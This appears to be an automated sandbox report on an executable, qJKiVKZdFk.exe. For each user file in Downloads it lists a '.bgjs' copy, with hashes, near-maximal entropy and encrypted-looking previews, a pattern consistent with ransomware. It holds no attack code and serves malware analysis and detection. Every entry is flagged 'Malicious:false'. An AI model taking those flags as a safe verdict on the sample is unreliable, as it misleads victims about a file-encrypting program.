                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.838504916812677
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:/Xr46VyNI+fFEAjhxkCLL0eIGe3aicsp9zMiFMk5UjDMebD:/r46VDEEMLL0dpaicsp9zMoB5UjD3D
                                                                                                                                      MD5:443630553740EA9110CF611211241142
                                                                                                                                      SHA1:02752F854068C90659EBFD31E3B3C2EF2E419569
                                                                                                                                      SHA-256:E9F4983781999119429180D554DF29879F2B4BBE374AF3DA81568B740BAFB974
                                                                                                                                      SHA-512:1A9942349372AB7C4541F8D0761455A6F51A6921ABD62EADBDFBACD042B67D71683637E74CBED9941FFC1A94AC58A0591021CB726D196AFB03D3F9E7D7DFED7A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:GLTYDx..6.......z.lHa..r?P..&%'.:.r....5...a*n...%(3^'.N;...a..B../..OX.{...S.:.M3.....w."a7.z~V.....bW..;....^h...._a....."+..]x.8#..p..[..3d...0.."...."..9D.~w..}...Aw.t.t.N..f5.MTu..q6./,@...~.O.\..%I....;f.*[.....(.x....^az........#.H..1.<y/w..n6V.n...co...J..=L.....a.=4.x.]i..p.58....jnz.\...:.{<.6.7V.G?...Y..!...0w6...+..^.....g.r....x...Bu...e..$.#..{Q.....0.1..!.G=.d;...plN........a...2..P,.j._.(...~..D.Q.b.....S...i?..a....L.^PR.<c$T...,Ey...:..k.j1O..v l..1i_7.:...z..J.Vm..x.+9..VLs...z.;"M..I.ET$..3`n....=._..Ii.;V....6.=..qCR..7X.D],..;L0...GC....N6st.....hu.:[Q.k.X.....K..J.....>"...A....wDB..S..........$..\MrE[!....>..kp.5.......`6y...|.T....]j..2.2v.L....%....H........ME.qF!...>..i~x.%. ..F..+.......P"2.. .@.@.}Q...j....\.X.K]..=%.;....sY|0l...%RTJz..u.D.....gID...,.........R. I.|n%..>..D_d..J;.B...%.#.y.Ev.6..iO.........Dw...M.s...J+<-8....dj...7.N-.ZPP.....u.PZa..4?J|W.b...q%......~\...~>..c]...#.u... ..!o.u.X..).-e...H.>

                                                                                                                                      C:\Users\user\Downloads\GLTYDMDUST.pdf

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.855743928559254
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:0N5bDPB7FjCVYf56tP1SeJcuA0GgoKjybwMAXvpZTZ90F8NMXm/JbD:0NZzNF2Vc61AGcd00c7f/fA8NumBD
                                                                                                                                      MD5:5365939ED72F4FA5BF59D33BABA476CF
                                                                                                                                      SHA1:ECC325B9293F70B043F7F1CAEA5A7D2839D40031
                                                                                                                                      SHA-256:25935D7F75CCBF8A6382CAAF419D7F670AB790B6EF62EB4B2E5AA6B208FD256A
                                                                                                                                      SHA-512:7BC2F586A11F2283BB6BD22C2E7D830091E581618C0F76094D4B59B9D1609E4EB38C996D517220695B47A58343E8050BC3BDB459EE1FE795F336448751106981
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:GLTYD..x..%.6..Q....$..q.......@._h..).=p..MB.}...Do.U...F..7........P..6o."$...........Hb..^.j,.oA..G.....An[^+.q..@.....<...`#>Z....t..".A.T.0.R...#.....a.X.........i..D......X......=..V u8@.[.GF.{..K...@.~rA..5Rba...7.s.xismb.s>.@..E..u......\RY.[.......2....u..lq...|8gY.+.R....{$..8.c.m.v^...xS...i..}.NJ........Q.j..Rp...N.........{.#......Wj...z...7.._........A$...u.Z..U@.u!.....z.u.c1."M.OP.K..U...'..Ln.....b.Z.:....v..R..9$D.....89....fC...KU.L...........gUm.:..x....N&..[.O.......P.,.#.d..Jg/.5.#.2.)n..>O.L.h.Z,.@ws.....W.=69..F}v<..t.O@...."%...,^y.X.o|{T.....7.%.^............d......N.W@.B.q)f....\.A....uX......a..oM..._..q.A"..'./oL4.........g+......4...A.......e........C...m...,R..r.......$_"N.MV.+AD.j.P..I.q.v@.zsle...../..._..dq........V .$...... .&.+...3.......(..(..C......A.~.s3.G..O.2.*...A>.x=6.C.....&yF=~....;.....$..0(...y..y&...=..~Pu!..?...^=4....Z7.p..(.L....5.X@A.g..O...K.Op.lq....}S....yxH+a..z..9VS8...c.Vi..d_,.y..

                                                                                                                                      C:\Users\user\Downloads\GLTYDMDUST.pdf.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.855743928559254
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:0N5bDPB7FjCVYf56tP1SeJcuA0GgoKjybwMAXvpZTZ90F8NMXm/JbD:0NZzNF2Vc61AGcd00c7f/fA8NumBD
                                                                                                                                      MD5:5365939ED72F4FA5BF59D33BABA476CF
                                                                                                                                      SHA1:ECC325B9293F70B043F7F1CAEA5A7D2839D40031
                                                                                                                                      SHA-256:25935D7F75CCBF8A6382CAAF419D7F670AB790B6EF62EB4B2E5AA6B208FD256A
                                                                                                                                      SHA-512:7BC2F586A11F2283BB6BD22C2E7D830091E581618C0F76094D4B59B9D1609E4EB38C996D517220695B47A58343E8050BC3BDB459EE1FE795F336448751106981
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:GLTYD..x..%.6..Q....$..q.......@._h..).=p..MB.}...Do.U...F..7........P..6o."$...........Hb..^.j,.oA..G.....An[^+.q..@.....<...`#>Z....t..".A.T.0.R...#.....a.X.........i..D......X......=..V u8@.[.GF.{..K...@.~rA..5Rba...7.s.xismb.s>.@..E..u......\RY.[.......2....u..lq...|8gY.+.R....{$..8.c.m.v^...xS...i..}.NJ........Q.j..Rp...N.........{.#......Wj...z...7.._........A$...u.Z..U@.u!.....z.u.c1."M.OP.K..U...'..Ln.....b.Z.:....v..R..9$D.....89....fC...KU.L...........gUm.:..x....N&..[.O.......P.,.#.d..Jg/.5.#.2.)n..>O.L.h.Z,.@ws.....W.=69..F}v<..t.O@...."%...,^y.X.o|{T.....7.%.^............d......N.W@.B.q)f....\.A....uX......a..oM..._..q.A"..'./oL4.........g+......4...A.......e........C...m...,R..r.......$_"N.MV.+AD.j.P..I.q.v@.zsle...../..._..dq........V .$...... .&.+...3.......(..(..C......A.~.s3.G..O.2.*...A>.x=6.C.....&yF=~....;.....$..0(...y..y&...=..~Pu!..?...^=4....Z7.p..(.L....5.X@A.g..O...K.Op.lq....}S....yxH+a..z..9VS8...c.Vi..d_,.y..

                                                                                                                                      C:\Users\user\Downloads\HMPPSXQPQV.png

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.853788329246481
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:2RbaOTH+uwsFoLU/f/n7YO9iwnuB4D7H31hDVFEn+Wg5BChdEBrVW0L0qHKbD:2RuOTeuwtLyf/iwnjD7X1JzRpH5BLzID
                                                                                                                                      MD5:5D446E67CA34638B61926F45E3E3F083
                                                                                                                                      SHA1:934201EE93CA3CE8301B59ED56B1C579D610989C
                                                                                                                                      SHA-256:BDA9491A23396930956DE53DBB0451FBB51C2BD2235AF033FBD4786D908CD628
                                                                                                                                      SHA-512:1505F14EACE05056878389B38F612788A887A037D89B1DE3D7EA7E8D2BC969CC843B0F2F1EC61713B286359E65A98A889ED168471FD3628212C2D602A6E03CB4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:HMPPSR4..u[.|........2GF..1J.+.w.b..O*G..|.1..B.....4.ocO.Z......|.6.......5.^.6...Ch..u.D..'m..W..M.9.......?m.mE..)...r.)...s...O...'[.......E...L.k....4...$Z......q3.0.....ka....P]...~.%U2...^.w#.$.G.Z.qkG.Ws.......y..H.?e.s.o\3'..n.Y..n....i...9.=.....x....1..8.)...s......0W6!.5...X....E.......' .\..5............9og...3.x../[ .~..(...?a.3Q.....uY.Y.t^t.}.....wIG8 ..J...L]8+.2..".{..'..&X.B....%3.........i.................W.Q?';..+.....V. ../H.^8....,...[.dy..CWnv;.......c.<.(..z....eV,..Y.1e.Nt..].U+.....g....;dP-.&...{!.g.x.....>..j.2....2f2..].,...P.).L..O...!D.*K.>.6.u.3..Z_.T>.b....... ..{..v.68.dgB.....h.&...0.h.xz...T..f..bUc?..E..h.t.A.S.b.......'....z.qr.?M..d{....../.=]_...z/A.T..."N.*....).T....h.D.*..mH1.b.C.Ts..q..c.a2g*9....T&.R.K...V.[W...d..Q%..op.?E..qjo`...z..)T..7../..`.W..R........L.x...j.}.E....J......].,i$\..'.^.wc*a...@.edh,j... .....A..YM?1...|.D.R.......l...6.u...YU...4..$..{b8u..z..)+"..t?u...6t..q).i..?...

                                                                                                                                      C:\Users\user\Downloads\HMPPSXQPQV.png.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.853788329246481
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:2RbaOTH+uwsFoLU/f/n7YO9iwnuB4D7H31hDVFEn+Wg5BChdEBrVW0L0qHKbD:2RuOTeuwtLyf/iwnjD7X1JzRpH5BLzID
                                                                                                                                      MD5:5D446E67CA34638B61926F45E3E3F083
                                                                                                                                      SHA1:934201EE93CA3CE8301B59ED56B1C579D610989C
                                                                                                                                      SHA-256:BDA9491A23396930956DE53DBB0451FBB51C2BD2235AF033FBD4786D908CD628
                                                                                                                                      SHA-512:1505F14EACE05056878389B38F612788A887A037D89B1DE3D7EA7E8D2BC969CC843B0F2F1EC61713B286359E65A98A889ED168471FD3628212C2D602A6E03CB4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:HMPPSR4..u[.|........2GF..1J.+.w.b..O*G..|.1..B.....4.ocO.Z......|.6.......5.^.6...Ch..u.D..'m..W..M.9.......?m.mE..)...r.)...s...O...'[.......E...L.k....4...$Z......q3.0.....ka....P]...~.%U2...^.w#.$.G.Z.qkG.Ws.......y..H.?e.s.o\3'..n.Y..n....i...9.=.....x....1..8.)...s......0W6!.5...X....E.......' .\..5............9og...3.x../[ .~..(...?a.3Q.....uY.Y.t^t.}.....wIG8 ..J...L]8+.2..".{..'..&X.B....%3.........i.................W.Q?';..+.....V. ../H.^8....,...[.dy..CWnv;.......c.<.(..z....eV,..Y.1e.Nt..].U+.....g....;dP-.&...{!.g.x.....>..j.2....2f2..].,...P.).L..O...!D.*K.>.6.u.3..Z_.T>.b....... ..{..v.68.dgB.....h.&...0.h.xz...T..f..bUc?..E..h.t.A.S.b.......'....z.qr.?M..d{....../.=]_...z/A.T..."N.*....).T....h.D.*..mH1.b.C.Ts..q..c.a2g*9....T&.R.K...V.[W...d..Q%..op.?E..qjo`...z..)T..7../..`.W..R........L.x...j.}.E....J......].,i$\..'.^.wc*a...@.edh,j... .....A..YM?1...|.D.R.......l...6.u...YU...4..$..{b8u..z..)+"..t?u...6t..q).i..?...

                                                                                                                                      C:\Users\user\Downloads\LFOPODGVOH.jpg

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.8481177992391435
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:xVnuxipML86d3Bw+kF4+E9voYNwrnDcb9XvsveulimC6/TobD:xVnuxiGo6dE2+075XvGeul9/mD
                                                                                                                                      MD5:35BFAFEC2363CD9410BF494A0D0F9122
                                                                                                                                      SHA1:3D8BBAC19FE8E4EDA73383CC5AF94437C3033E30
                                                                                                                                      SHA-256:E5304E7C23F2E49A6FB96E06E8CD7B9B5E53900F0D2550D48C6E94C86F239ED2
                                                                                                                                      SHA-512:8ED52DC9AB8FD28610CBEDF11D69558F8A26635A273544442245064DB726770B6F127C3080DF73855558F3D5DB526BE4FF39084B33A3DEBFF359CFF7E50F55A4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:LFOPO.......G .^6..V..[.K.....K..N..8.....#.(9..qG.x.........z}. ^1.F.....O..*:.....w.~.E.L..^.iE4..](..[.t...S$...... ....)4b....t.|gMB..}..y;4[<.%..........2....62....F..U.Y.....d.I.O~.h.....N.......VZ.q/s..T.......{..'.X.`~.1..Q..G.....;($/..~~.....t.*.PsQ5d..'..]...@..{*2...:3.....M......~+!-$....h.K.H........Q.n..~y.^%....Nh.s0..VL.......:.X...I."I9U.E"4Q.......<.[Sry.....h...S..5n.'f|M.5.`lz.0n.q.;..a:./P.$i.TA+...5G.H.'.'......PX.9..=J..l.)....2Q...re....K..[P.E.g~5.o.y+....)._S.e....D.^.q.ak53....V.u...........s.m...;+..`.F..R.E....#..!%..A..f....`.....m.A3.4VYH.%a.xL.#..."./f%U....~/t.S....w.3..=..t......u.-x...aK.(.n....Kq....|.......FrAA.+.N..{V....0..$.........~.f.s...#.@6...b]Py.....0....}...4..`h....,....W[........,l!&..g.O;2}....[..B......5...*..~..$Yf...n..e...^..I.......NG1..........r..7VpJf.m...a...q2).R...L......@.....B`k'...../..G..!p..lK.....8..U....n-........}..d.B.N..].s....8...h.0O........A.........[zH;KXzcj...@z..o.9

                                                                                                                                      C:\Users\user\Downloads\LFOPODGVOH.jpg.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.8481177992391435
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:xVnuxipML86d3Bw+kF4+E9voYNwrnDcb9XvsveulimC6/TobD:xVnuxiGo6dE2+075XvGeul9/mD
                                                                                                                                      MD5:35BFAFEC2363CD9410BF494A0D0F9122
                                                                                                                                      SHA1:3D8BBAC19FE8E4EDA73383CC5AF94437C3033E30
                                                                                                                                      SHA-256:E5304E7C23F2E49A6FB96E06E8CD7B9B5E53900F0D2550D48C6E94C86F239ED2
                                                                                                                                      SHA-512:8ED52DC9AB8FD28610CBEDF11D69558F8A26635A273544442245064DB726770B6F127C3080DF73855558F3D5DB526BE4FF39084B33A3DEBFF359CFF7E50F55A4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:LFOPO.......G .^6..V..[.K.....K..N..8.....#.(9..qG.x.........z}. ^1.F.....O..*:.....w.~.E.L..^.iE4..](..[.t...S$...... ....)4b....t.|gMB..}..y;4[<.%..........2....62....F..U.Y.....d.I.O~.h.....N.......VZ.q/s..T.......{..'.X.`~.1..Q..G.....;($/..~~.....t.*.PsQ5d..'..]...@..{*2...:3.....M......~+!-$....h.K.H........Q.n..~y.^%....Nh.s0..VL.......:.X...I."I9U.E"4Q.......<.[Sry.....h...S..5n.'f|M.5.`lz.0n.q.;..a:./P.$i.TA+...5G.H.'.'......PX.9..=J..l.)....2Q...re....K..[P.E.g~5.o.y+....)._S.e....D.^.q.ak53....V.u...........s.m...;+..`.F..R.E....#..!%..A..f....`.....m.A3.4VYH.%a.xL.#..."./f%U....~/t.S....w.3..=..t......u.-x...aK.(.n....Kq....|.......FrAA.+.N..{V....0..$.........~.f.s...#.@6...b]Py.....0....}...4..`h....,....W[........,l!&..g.O;2}....[..B......5...*..~..$Yf...n..e...^..I.......NG1..........r..7VpJf.m...a...q2).R...L......@.....B`k'...../..G..!p..lK.....8..U....n-........}..d.B.N..].s....8...h.0O........A.........[zH;KXzcj...@z..o.9

                                                                                                                                      C:\Users\user\Downloads\NWCXBPIUYI.jpg

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.848785180101415
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:cnWmigeIsto64+4+ONr0DFZ1fVPTh4IFeCcABROfnduJLpAm1tJbD:GH9ehO64Cm0DL1f4ImIJLum1tpD
                                                                                                                                      MD5:EE9858B5E1D05FED4E81C963FF8D0EA7
                                                                                                                                      SHA1:08B18B1048B688CF166FFAF691060F43E1F481A1
                                                                                                                                      SHA-256:6C85BC16FCF146171D807395337C53E8ED997596939181CBA8CEDA0B4A84136D
                                                                                                                                      SHA-512:D4D415F3A60820F3E4CEA44145359A277570A51D6D1006A87E909AEA1F816EA378345DB4562477D81DDD63A686952B229D1BC8210FC4E2D423B4912D692DD641
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NWCXB....TP.c......_@.d........@..Q.z.....P.....840./.x.D~eb..R.F.9...'.....\.t*w.`....b.T..L..1.....^. J./..-A4P..v.'.P...b...k.a....C.0.\!..|.2.9.-c...!.d.......=&........c.].....Iy...R...~..hlN.<....2..<oBu...."..l.<..-OE.BI3.F`...PS.N.k...p..x..ff.-....{`nN#.m.&..g.e..OF..`_..1T.i.q.+f..R.m..d...j..9...9{.1.o....G].N.|1.f.`.)xj...S....:7...P.Y........&..B...9...a ./.;..I..~uD'...1f.....c-.Y...RS.h.....L....\..K...)....@..'...M.9....zrD...e..*m.?n&:.O.R.X9e...+3..5f.c....^..Z:....iPe.......w..Q..[.,...$.........+..2-.;;.[.lz....g..D.=m...G....!...1'.1X.m7a.ix.<@..l..}W2C...........>f.}P...w.Z&5..9+i[.,.$.....j.d...Y.X;d...........z..r.`OK{.u.4..t.,..yo*..K.E?..$.l!..p..+.O.=?.U]ipP~n.c.G.7.../.>.9.D9m.T.....3.MI.N3..N.;.nx....q.|.....x...E.HwgZ....8.q2w.7.Z.lO...$B..>A;F....F..=.#...A5...."T.,.c.]...G+..x.N.^?...d6.z....;.B.,...<...#Y}"*....}T....s...A...x.BW.Q..P.h '.....uJ.3{..vJ..z.{...G..M.....d.c$.;Q...B.S.]..Z'.K...$V....

                                                                                                                                      C:\Users\user\Downloads\NWCXBPIUYI.jpg.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.848785180101415
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:cnWmigeIsto64+4+ONr0DFZ1fVPTh4IFeCcABROfnduJLpAm1tJbD:GH9ehO64Cm0DL1f4ImIJLum1tpD
                                                                                                                                      MD5:EE9858B5E1D05FED4E81C963FF8D0EA7
                                                                                                                                      SHA1:08B18B1048B688CF166FFAF691060F43E1F481A1
                                                                                                                                      SHA-256:6C85BC16FCF146171D807395337C53E8ED997596939181CBA8CEDA0B4A84136D
                                                                                                                                      SHA-512:D4D415F3A60820F3E4CEA44145359A277570A51D6D1006A87E909AEA1F816EA378345DB4562477D81DDD63A686952B229D1BC8210FC4E2D423B4912D692DD641
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NWCXB....TP.c......_@.d........@..Q.z.....P.....840./.x.D~eb..R.F.9...'.....\.t*w.`....b.T..L..1.....^. J./..-A4P..v.'.P...b...k.a....C.0.\!..|.2.9.-c...!.d.......=&........c.].....Iy...R...~..hlN.<....2..<oBu...."..l.<..-OE.BI3.F`...PS.N.k...p..x..ff.-....{`nN#.m.&..g.e..OF..`_..1T.i.q.+f..R.m..d...j..9...9{.1.o....G].N.|1.f.`.)xj...S....:7...P.Y........&..B...9...a ./.;..I..~uD'...1f.....c-.Y...RS.h.....L....\..K...)....@..'...M.9....zrD...e..*m.?n&:.O.R.X9e...+3..5f.c....^..Z:....iPe.......w..Q..[.,...$.........+..2-.;;.[.lz....g..D.=m...G....!...1'.1X.m7a.ix.<@..l..}W2C...........>f.}P...w.Z&5..9+i[.,.$.....j.d...Y.X;d...........z..r.`OK{.u.4..t.,..yo*..K.E?..$.l!..p..+.O.=?.U]ipP~n.c.G.7.../.>.9.D9m.T.....3.MI.N3..N.;.nx....q.|.....x...E.HwgZ....8.q2w.7.Z.lO...$B..>A;F....F..=.#...A5...."T.,.c.]...G+..x.N.^?...d6.z....;.B.,...<...#Y}"*....}T....s...A...x.BW.Q..P.h '.....uJ.3{..vJ..z.{...G..M.....d.c$.;Q...B.S.]..Z'.K...$V....

                                                                                                                                      C:\Users\user\Downloads\NWCXBPIUYI.xlsx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.848455360187332
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:utk+9k20zMaEbxEvC7DELkCGy01mpRu6+pN/3mSZGOL/YCB0e16ya2bD:uG+9k20zMaEbGqUkCDR7+pNPmGp31LbD
                                                                                                                                      MD5:DDEA3BE6B334AE6ACD6815CD8D867FE5
                                                                                                                                      SHA1:37ADD5146704FF73C55C03A40708FEE37311BF33
                                                                                                                                      SHA-256:7C664C2FDA46EA69927D7649CA0D5E1349AA5CBA43CF94CC9435065420FBE5DC
                                                                                                                                      SHA-512:8C7217494604BC10C68ABE552A012CA0B8C82953C2E6CD78A0BBFBC1E1B689FD53423A8669B87C6795600BFA0C6FF8DCB698C2092EA0F050230BEDB257B50938
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NWCXBz{.......m+..$.?+8........0..S4|....u.w....8.jk.~e...4....2h..u.[3.z.........)^P.?.[l.......R.VA*.....u...Y..H.}.8.jn.dUW!S&ac.B.3iab...@....|.o#9......8#<kRI..S..e.?.&..s..X.....bi..l,a.......^....7.i........Y.0l_..........=|.l}W-..!z.M2.FB...y.2U...nb.\.(.Y&..Ql..2q^13z.....o>............&C....%B.....]..3..gm.CJr..r..#.06..=...>....85xp.h......R. .>aH.d. .....0.I.p..Z.....h\6.....v.G.K. *.....;j=*,..H..!d..]h14....l.;.Q..R..6qd?T.r..[.Cd....,...3g(..K...l6h..]i3)1...B.L...;)...5Kt7.;...."....H$.T.(h..].N}............%......].......G. .."\..R..a.{.e......f.piH...uj.'....m...G..u.S.c.=..L...`...P...e..'Q.g.i...j....Iab......6..b..;..,).M.....5.i.......^..x..pW.c..P|EH....w'.3..J.. ..6..x..[;`g..<B...].m.E....g.7n.;..n...d.YKP.(.....:.k.K.4....[."..B..j(.....*......d@.o.6c....a..j.......S^(#F3..*{..TT.Y..d8.\.C.YM."..~a4\...h..K.;.b.}Hw....s(.Rr5...9.D^...5t..j.j.B...Uw]...3.o.z.7.rq.o...P..D.Xj.v.j'r...j..........:.s..Z.d.P%...

                                                                                                                                      C:\Users\user\Downloads\NWCXBPIUYI.xlsx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.848455360187332
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:utk+9k20zMaEbxEvC7DELkCGy01mpRu6+pN/3mSZGOL/YCB0e16ya2bD:uG+9k20zMaEbGqUkCDR7+pNPmGp31LbD
                                                                                                                                      MD5:DDEA3BE6B334AE6ACD6815CD8D867FE5
                                                                                                                                      SHA1:37ADD5146704FF73C55C03A40708FEE37311BF33
                                                                                                                                      SHA-256:7C664C2FDA46EA69927D7649CA0D5E1349AA5CBA43CF94CC9435065420FBE5DC
                                                                                                                                      SHA-512:8C7217494604BC10C68ABE552A012CA0B8C82953C2E6CD78A0BBFBC1E1B689FD53423A8669B87C6795600BFA0C6FF8DCB698C2092EA0F050230BEDB257B50938
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NWCXBz{.......m+..$.?+8........0..S4|....u.w....8.jk.~e...4....2h..u.[3.z.........)^P.?.[l.......R.VA*.....u...Y..H.}.8.jn.dUW!S&ac.B.3iab...@....|.o#9......8#<kRI..S..e.?.&..s..X.....bi..l,a.......^....7.i........Y.0l_..........=|.l}W-..!z.M2.FB...y.2U...nb.\.(.Y&..Ql..2q^13z.....o>............&C....%B.....]..3..gm.CJr..r..#.06..=...>....85xp.h......R. .>aH.d. .....0.I.p..Z.....h\6.....v.G.K. *.....;j=*,..H..!d..]h14....l.;.Q..R..6qd?T.r..[.Cd....,...3g(..K...l6h..]i3)1...B.L...;)...5Kt7.;...."....H$.T.(h..].N}............%......].......G. .."\..R..a.{.e......f.piH...uj.'....m...G..u.S.c.=..L...`...P...e..'Q.g.i...j....Iab......6..b..;..,).M.....5.i.......^..x..pW.c..P|EH....w'.3..J.. ..6..x..[;`g..<B...].m.E....g.7n.;..n...d.YKP.(.....:.k.K.4....[."..B..j(.....*......d@.o.6c....a..j.......S^(#F3..*{..TT.Y..d8.\.C.YM."..~a4\...h..K.;.b.}Hw....s(.Rr5...9.D^...5t..j.j.B...Uw]...3.o.z.7.rq.o...P..D.Xj.v.j'r...j..........:.s..Z.d.P%...

                                                                                                                                      C:\Users\user\Downloads\NYMMPCEIMA.docx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.847044922942074
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:sx8C7fX6QcXroY9Mku6bDmfO+sEehME7l/iYcja+eDNuV2FXFh8v6v//O3dpaZbD:gfKVoYCU6bsEPAQvm+eDYIMo/cdYZD
                                                                                                                                      MD5:437D0334D1362F7152E4A80AD6D79F8C
                                                                                                                                      SHA1:52700CD678D1EBC3204A0AE6F7F06FA8146D3B28
                                                                                                                                      SHA-256:367B333BCA2CA2B9EAEF51A54A35416CF664AC071FD8D7D4C992FA72D14B1A93
                                                                                                                                      SHA-512:DD655D80F4FD8139CDCA9140726A5B3C82A524D17DE09BA03CA7B83410B872A3D78394E3E56D338790FAF1DD2D50B1D93C0942DCEA81D8C49B2B48688236F47E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NYMMP......~.{.m...u~...+.z ...2.S4Hd.*.{C...h[..^.r+...[.nvO.;=....j..K....s..%.'W...c..c-.AG..i..lW|..5..`Eb;..c...K.. .....O.#,A.T.Y .........Rw...&^`.._.;30v2...ah.Y...;.t..a;......_.u.8o.:....F.P..&;..T/..gz3.G....9.7..b...$...".U.x..../T.#......G$....0.:mq.s..;.Ak.v.Yzl.."I.U..k.-1.>.B.....i[....E|...H.*..b0.;t.Z.j.aj..+%..aBr.(...T....-X. .k.......".`..D).88e.S.ne......0.t.p...{dA.N%].-....E.jvTG../.... 6...E?..".&Ww..'_.1.......Q0X.%..S...X..%Bc/.C~....d.....v.Z5.e...U%m....y....e...3..r.).8..`...gN..SKR...lB..^.Hj.Z...'.y.Q..$...4...v....k.Bh....j..V..E.!.~.s.d...B..E*..+...v.........JOX.$;...U:.9@"H/....n......p..&.M/He..C.f"....k.O....A...~....j4Gi.\.;.dE.....XV4....=k...\Eb]..Sc..>......w.u.#...qh.s..v..F..._8.'.kk>....o.....Cv......%.+.....c1....]./...<.p._.Y...K..d|."z...L./..'...f..e...vx..X..Q.q.H(...(.E...[1kU.S.'C.1.xZ$)>.[-h..Q.a.....I......1.,..^2....<$./Y.q^....H*H*.G...k.k9.V..P1...^..._..q7.......5........@...J

                                                                                                                                      C:\Users\user\Downloads\NYMMPCEIMA.docx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.847044922942074
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:sx8C7fX6QcXroY9Mku6bDmfO+sEehME7l/iYcja+eDNuV2FXFh8v6v//O3dpaZbD:gfKVoYCU6bsEPAQvm+eDYIMo/cdYZD
                                                                                                                                      MD5:437D0334D1362F7152E4A80AD6D79F8C
                                                                                                                                      SHA1:52700CD678D1EBC3204A0AE6F7F06FA8146D3B28
                                                                                                                                      SHA-256:367B333BCA2CA2B9EAEF51A54A35416CF664AC071FD8D7D4C992FA72D14B1A93
                                                                                                                                      SHA-512:DD655D80F4FD8139CDCA9140726A5B3C82A524D17DE09BA03CA7B83410B872A3D78394E3E56D338790FAF1DD2D50B1D93C0942DCEA81D8C49B2B48688236F47E
                                                                                                                                      Malicious:false
